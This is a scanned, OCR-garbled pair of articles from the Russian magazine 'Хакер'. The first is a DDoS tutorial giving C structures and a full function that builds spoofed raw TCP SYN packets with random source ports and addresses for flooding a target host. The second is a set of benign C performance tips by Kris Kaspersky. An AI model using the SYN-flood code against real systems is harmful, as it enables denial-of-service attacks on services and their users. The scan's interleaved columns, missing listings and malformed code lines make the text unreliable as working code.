книги хакеры / журнал хакер / 091_Optimized

WOLF D.A. AKA PAYHASH

DDoS-атаки для

программиста

МНОГО УЖЕ ПИСАЛИ В НАШЕМ ЖУРНАЛЕ ПРО DDOS-АТАКИ. ТЫ НАВЕРНЯКА ЗНАКОМ С ТЕОРИЕЙ ЭТОГО ПРОЦЕССА, НО ТАК УЖ ПОВЕЛОСЬ, ЧТО НИКАКОЕ ХАРДКОРНОЕ ПОВЕСТВОВАНИЕ НИКОГДА НЕ ОБХОДИТСЯ БЕЗ ПРОПИСНЫХ ИСТИН :). ИТАК, DDOS-АТАКА НАПРАВЛЕНА НА ИСТОЩЕНИЕ ПРОГРАММНО-АППА- РАТНЫХ РЕСУРСОВ СИСТЕМЫ, КОТОРОЕ ПРОИСХОДИТ В РЕЗУЛЬТАТЕ ПРОЦЕССА НЕПРЕРЫВНОЙ ОБРАБОТКИ «ТЯЖЕЛОГО» ПОТОКА ИНФОРМАЦИИ («ДАВЛЕНИЯ»).

Этапы установления связи между двумя удаленными системами с помощью протокола TCP/IP.

Посмотрим на вторую картинку. Из нее видно, что хост с IP-адресом 192.168.0.1 посылает подделанный IP-пакет с другим обратным IP-ад-

ресом, например 192.168.30.30 на машину с IP-адресом 192.168.20.20.

Естественно, прочитав пакет с флагом SYN, она ответит пакетом с флагом SYNACK. Прочитав поле отправителя (адрес источника), система направит пакет на другой адрес, и им будет 192.168.30.30, поэтому уже не важно, есть ли такой IP или нет.

Практикой проверенно, что если на роутере отсутствует контроль адреса отправителя (FireWall), то такой пакет не будет им отвергнут, а наоборот, будет «перекинут» дальше. На сегодняшний день провайдеры не ведут подобного контроля на своих маршрутизирующих системах (им это ни к чему).

Практика

Посмотрим, как на языке Си можно подделать пакет IP. Для этого необходимо создать следующую структуру IP-заголовка:

typedef struct hdr_ip

{

/* Здесь не все поля заголовка IP, подробней смотрим в rfc 792*/ /* Контрольная сумма IP-заголовка */

unsigned short ip_sum;

/* Аргументы источника и отправителя */ struct in_addr ip_src, ip_dst;

} IPHEADER;

Манипуляции производятся с параметрами ip_src и ip_dst ult, где покоятся адрес источника и адрес отправителя.

Мы будем менять адрес источника пакета случайным образом, чтобы, согласно третьему постулату, создать нагрузку на удаленную систему. Для этого можно использовать следующую функцию — генератор случайных IP-адресов:

теперь посмотрим на структуру TCP-заголовка:

typedef struct br0_tcp {

/* В качестве сжатия статьи урезаем часть TCP-заголовка За подробной информацией обращайтесь к rfc 793*/ USHORT th_sport; // Порт-источник ( может быть любой ) USHORT th_dport; // Порт назначения ( атакующей службы )

unsigned char th_flag; // Этап подключения 0x02 — запрос на начало сеанса

#define TH_SYN 0x02

USHORT th_sum; // Контрольная сумма TCP-заголовка

}TCPHEADER;

Для подсчета контрольных сумм заголовков нам необходимо ввести один псевдозаголовок с такой структурой:

typedef struct pseudo_header { struct in_addr saddr;

struct in_addr daddr; char zer0; // 0

char ptcl; // Тип протокола IPPROTO_TCP unsigned short tcpl;

} PSDHEADER;

После этого можно смело считать контрольные суммы заголовков IPv4 протокола (скажу честно: функцию мы дернули из заголовочных файлов ОС FreeBSD, но поскольку это стандарт, в Windows тоже работает :)). В этом коде придется разбираться самому, благо это не трудно (см. листинг на диске).

Итак, с основными тезисами и понятиями мы разобрались, остается все это собрать в кучу и отправить системе, которую собираемся нагружать. В этом нам поможет функция, которую можно видеть на листинге 2. Она собирает пакет IPv4 и возвращает на него указатель. На вход в нее мы подадим четыре аргумента — это указатель на буфер, в котором будем записыватьсобранныйIPv4 пакет, адрес отправителя, адресполучателя и порт назначения. В этой функции нет ничего особенного – обычное заполнение полей структуры IP/TCP, которые мы рассматривали выше.

Функция для сборки TCP/IP-пакета

static u_char *constructpacket(u_char *inetfragment,

struct in_addr srcaddr, struct in_addr dstaddr, u_short dstport)

{

// tcp/ip-заголовки

IPHEADER ippkt; // IP-заголовок TCPHEADER tcppkt; // TCP-заголовок

PSDHEADER pseudo; // TCP/IP-псевдозаголовок

/* Обнуление 60 байт TCP/IP-заголовка */ char tcpip[60]={0};

/* Здесь пишем версию и длину IP-пакета */ ippkt.ip_vhl=(4<<4 | sizeof(ippkt)/sizeof(unsigned long)); ippkt.ip_tos=0; // Приоритет пакета

/* Длина всего IP-пакета плюс tcp */ ippkt.ip_len=htons(sizeof(ippkt)+sizeof(tcppkt)); ippkt.ip_id=1; // id-пакета

ippkt.ip_off=0; // смещение ippkt.ip_ttl=128; // время жизни пакета ippkt.ip_p=IPPROTO_TCP; // тип протокола

// контрольная сумма пакета (рассчитываем ниже) ippkt.ip_sum=0;

ippkt.ip_src=srcaddr; // адрес источника

/* адрес получателя, на котором будем создавать нагрузку */ ippkt.ip_dst=dstaddr;

/* Теперь заполняем TCP-заголовок*/

/* Порт источника случайный, в диапазоне от 0 до 65000. Не удивляйся — нулевые порты тоже существуют */

tcppkt.th_sport=htons(rand()%65000);

/* Порт назначения (на котором будем создавать нагрузку) */ tcppkt.th_dport=htons(dstport);

/* ;) Просто номер пакета, любое число */ tcppkt.th_seq=htonl(0x4655434b); tcppkt.th_ack=0x00000000; tcppkt.th_lenres=(sizeof(tcppkt)/4<<4|0);

/* SYN-пакет (попытка установить начало сеанса) */ tcppkt.th_flag=2;

tcppkt.th_win=htons(512); tcppkt.th_urp=0;

/* Контрольная сумма TCP-пакета (рассчитывается ниже) */ tcppkt.th_sum=0;

/* Заполнение псевдозаголовка для расчета контрольных сумм */ pseudo.saddr=ippkt.ip_src;

pseudo.daddr=ippkt.ip_dst; pseudo.zer0=0; pseudo.ptcl=IPPROTO_TCP; pseudo.tcpl=htons(sizeof(tcppkt)); memcpy(tcpip, &pseudo, sizeof(pseudo));

memcpy(tcpip+sizeof(pseudo), &tcppkt, sizeof(tcppkt));

/* Считаем контрольную сумму tcp-заголовка и пишем Ip-заголовок в буфер tcpip */

tcppkt.th_sum=in_cksum((USHORT*)tcpip, sizeof(pseudo)+ sizeof(tcppkt));

memcpy(tcpip, &ippkt, sizeof(ippkt)); memcpy(tcpip+sizeof(ippkt), &tcppkt, sizeof(tcppkt)); memset(tcpip+sizeof(ippkt)+sizeof(tcppkt), 0, 4);

/* Считаем контрольную сумму IP-заголовка и пишем его в буфер tcpip */

ippkt.ip_sum=in_cksum((USHORT *)tcpip,sizeof(ippkt)+sizeof(tcppkt)); memcpy(tcpip, &ippkt, sizeof(ippkt));

/* Кладем все в буфер inetfragment, его же и возвращаем */ memset(inetfragment, 0, sizeof(struct br0_ip) + sizeof(struct br0_tcp)); memcpy(inetfragment, tcpip,

sizeof(struct br0_ip) + sizeof(struct br0_tcp));

return inetfragment;

}

КРИС КАСПЕРСКИ

ХАК№1

Борьба с инвариантами

Самой распространенной ошибкой, снижающей производительность, является присутствие функ- ций-инвариантов в теле цикла. Вот классический пример:

for (a = 0, x = 0; a < strlen(s); a++)

{

x += s[a];

}

С точки зрения программиста, очевидно, что функция strlen не модифицирует строку s, а поэтому может быть вычислена лишь однажды. Только вот компилирующий этого не знает, придерживаясь принципа: все, что может быть передано по ссылке, может быть изменено, поэтому strlen(s) заново вычисляется на каждой итерации цикла, что при длинных строках снижает производительность на порядок!

Исправленный вариант выглядит так:

ХАК№3

Правильный выбор функций

При работе с относительно короткими строками замена strlen(s) на strchr(s, 0) может дать до 5-7% ускорения, а вот замена нескольких strcat'ов на последовательность вызовов нестан дартной функцией stpcpy (которая тем не менее, присутствует во всех современных компиляторах) значи тельно выигрывает!

n = strlen(s);

for (a = 0, x = 0; a < n; a++)

{

x += s[a];

}

ХАК№2

Выравнивание строк

Наиболее эффективно обрабатываются строки, начинающиеся с адреса, кратного четырем. Именно так компилятор размещает их в стеке и статической памяти. Отсюда функция strlen(s) выполняется эффективно, а вот strlen(s+1) — не

очень. То же самое относится и ко всем остальным функциям. Поэтому всегда стремись выравнивать строки, когда это только возможно. Ска-

жем, «strcpy(s, «bytes »); strcat(s, very_long_string);» выполняется неэ-

ффективно, но если переписать код так: «strcpy(s, «bytes: »); strcat(s, very_long_string);», то скорость его выполнения значительно возрастет за счет того, что адрес конца строки s станет кратен 4-м байтам.

Переписанный код выглядит так: if (char *x, int *dst, int n)

{

int i,t =0;

// сохранение суммы во временной переменной for (i=0;i<n;i++)

t+=x[i];

*dst+=t; // запись конечного результата в память

}

Неудачный выбор приоритетов в Си

Вопреки здравому смыслу конструкция типа *p[a]++ увеличивает отнюдь не содержимое ячейки, на которую указывает *(p+a), а значение самого указателя p! Для достижения ожидаемого результата необходимо либо явно навязать наше намерение компилятору путем расстановки скобок: «(*p)[a]++;», либо же вовсе отказаться от оператора «++», заменив его оператором «+=», и тогда наш код будет выглядеть так: «*p[a]+=1;».

Представляется интересным докопаться до сути происходящего, ведь основное кредо Си — краткость. Чего стоит один неявный int, который попил много крови разработчикам компиляторов. И тут... вдруг сталкиваешься с таким расточительством! Ведь чтобы использовать '*', надо ставить скобки, а это — целых два нажатия на клаву. Зачем? Может быть, есть такие ситуации, где именно такой расклад приоритетов дает выигрыш? О чем вообще думали в этот момент разработчики языка? В доступных мне книжках никаких вразумительных объяснений ситуации я так и не нашел.

Прозрение наступило внезапно, и причина, как выяснилось, оказалась даже не в самом языке, а в особенностях косвенной автоинкрементной/автодекрементной адресации процессора PDP-11, из которого, собственно, и вырос Си. Команда типа «MOV @(p)+, xxx» пересылает содержимое **p в xxx и затем увеличивает значение p. Да! Именно p, а отнюдь не ячейки, на которую **p ссылается!!!

Так стоит ли удивляться тому, что люди, воспитанные на идеологии PDP-11, перенесли ее поведение и на разрабатываемый ими язык? И, кстати, о птичках. Система адресации PDP-11 намного мощнее, удобней и элегантнее того уродства, что реализовано в x86...

Хочешь испытать свой компилятор? Нет проблем! Вот довольно познавательный листинг:

main()

{

char buf; char* p_buf[2]; char **p; #define INIT buf=0x66; *p_buf=&buf; *(p_buf+1)=&buf; p=&p_buf;

INIT;

printf("char **p;\n");

printf("p = %p; *p = %p; **p = %x\n\n",p, *p, **p);

*p[0]++; printf("*p[0]++;\n");

printf("p = %p; *p = %p; **p = %x\n",p, *p, **p); printf("смотрите, увеличилось не содержимое **p,\n"); printf("а указатель, на который ссылается *p!\n"); printf("то есть мы получили совсем не то, что хотели!\n\n");

INIT;

(*p)[0]++; printf("(*p)[0]++;\n");

printf("p = %p; *p = %p; **p = %x;\n",p, *p, **p); printf("хорошо, заключаем *p в скобки, тем самым явно\n");

printf("навязывая компилятору последовательность действий\n\n");

INIT;

*p[0]+=1; printf("*p[0]+=1;\n");

printf("p = %p; *p = %p; **p = %x;\n",p, *p, **p); printf("забавно, но замена оператора ++ на оператор +=\n"); printf("эту проблему как рукой снимает!\n");

}

Для преодоления катастрофической нехватки регистров некоторые компиляторы стремятся совмещать счетчик цикла с указателем на обрабатываемые данные. Код вида «for (i = 0; i < n; i++) n+=a[i];» транс-

формируется оптимизатором в «for (p= a; p < &a[n]; p++) n+=*p;». Эко-

номия налицо! Вместо четырех переменных после преобразования осталось всего лишь три!

Впервые (насколько мне известно) эта техника использовалась в компиляторах фирмы Hewlett-Packard, где она фигурировала под термином register reassociation. А что же конкуренты?! Возьмем следующий код (кстати, выдранный из документации на HP-компилятор):

int a[10][20][30]; void example (void)

{

int i, j, k;

for (k = 0; k < 10; k++) for (j = 0; j < 10;j++)

for (i = 0; i < 10; i++) a[i][j][k] = 1;

}

Грамотный оптимизатор должен переписать его так:

int a[10][20][30]; void example (void)

{

int i, j, k;

register int (*p)[20][30]; for (k = 0; k < 10; k++) for (j = 0; j < 10; j++)

for (p = (int (*)[20][30]) &a[0][j][k], i = 0; i < 10; i++) *(p++[0][0]) = 1;

}

Эксперимент показывает, что ни Microsoft Visual C++, ни GCC не выполняют регистровых реассоциаций ни в сложных, ни даже в простейших случаях. С приведенным примером справился один лишь Intel C++, да и то лишь частично, поэтому в критических к производительности случаях оптимизировать код необходимо вручную. z